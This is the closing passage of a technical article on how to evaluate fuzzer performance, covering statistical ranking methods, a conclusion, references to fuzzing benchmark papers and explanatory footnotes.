 Therefore, experimenters must reach their own conclusions through methods that satisfy them. An example is “Rank 8 fuzzers. Count the number of times they were in the top 3 when ranking 8 fuzzer's code coverage in each of 10 PUTs in descending order. The fuzzer with the highest value could then be considered the best.”.

 This way, there is no complete consensus in the fuzzing community on statistical evaluation methods for experimental results. Depending on what one wants to determine from the experimental results, it is necessary to carefully consider what statistical methods to use.

Conclusion

 This article explains some of the pitfalls that may occur when evaluating the performance of a fuzzer, as well as some notes on how to construct an experimental setup. When evaluating the performance of fuzzers, it is important to understand the characteristics of each fuzzer and set up an appropriate experiment according to the problem you want to investigate.

 We will investigate the performances of different fuzzers and continue research and development to incorporate them in fuzzuf.

 In the next article, we will cover the concept of patch analysis, which is important in the development of 1-day exploits, using Google Chrome's 1-day as an example.

References

[1] Marcel Böhme, Laszlo Szekeres, Jonathan Metzman. On the Reliability of Coverage-Based Fuzzer Benchmarking. 44th International Conference on Software Engineering (ICSE 2022) https://mboehme.github.io/paper/ICSE22.pdf

[2] Marcel Böhme, Danushka Liyanage, Valentin Wüstholz. Estimating residual risk in greybox fuzzing. Proceedings of the 29th ACM Joint Meeting on European Software Engineering Conference and Symposium on the Foundations of Software Engineering (ESEC/FSE 2021) https://mboehme.github.io/paper/FSE21.pdf

 

1: Of course, with both graphs, you can also explain that the optimization has no negative effect on the execution speed.
2: Code coverage may vary depending on the instrumentation methods used (e.g., with dominator tree optimization), but we will simplify by ignoring these cases.
3: Although the seed for the pseudorandom generator can be fixed, the behavior and performance of fuzzers can still vary depending on the chosen seed values.
4: Adding codes to the program to feed back information from the PUT to the fuzzer, such as coverage measurements.
5: Unless there is a special reason such as working with small programs for pilot implementation.
6: Note that some fuzzer implementations bind to a CPU core.
7: Comparing Fuzzers on a Level Playing Field with FuzzBench is a good example of a paper that appropriately handles testing.